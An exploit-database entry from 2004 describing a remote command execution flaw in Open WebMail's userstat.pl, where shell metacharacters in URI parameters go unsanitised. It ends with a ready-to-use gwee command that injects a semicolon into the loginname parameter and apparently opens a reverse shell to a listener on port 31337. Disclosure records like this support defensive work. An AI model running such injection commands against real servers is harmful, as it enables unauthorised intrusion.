Open WebMail 1.x2.x - Remote Command Execution Variant

2004-05-10T00:00:00
ID EXPLOITPACK:1099B51ECF691539491BE5422CBF9F61
Type exploitpack
Reporter Nullbyte
Modified 2004-05-10T00:00:00

Description

Open WebMail 1.x2.x - Remote Command Execution Variant

                                        
                                            source: https://www.securityfocus.com/bid/10316/info

A vulnerability has been reported in Open WebMail that allows a remote attacker to execute arbitrary commands on a vulnerable host. The problem is due to insufficient sanitization of shell metacharacters that are passed to the vulnerable software through URI parameters.

Exploitation of the vulnerability could allow a non-privileged user to remotely execute arbitrary commands in the context of the web server that is hosting the vulnerable application.

$ gwee -L -y'loginname=%3B' -llocalhost -p31337 http://www.example.com/cgi-bin/openwebmail/userstat.pl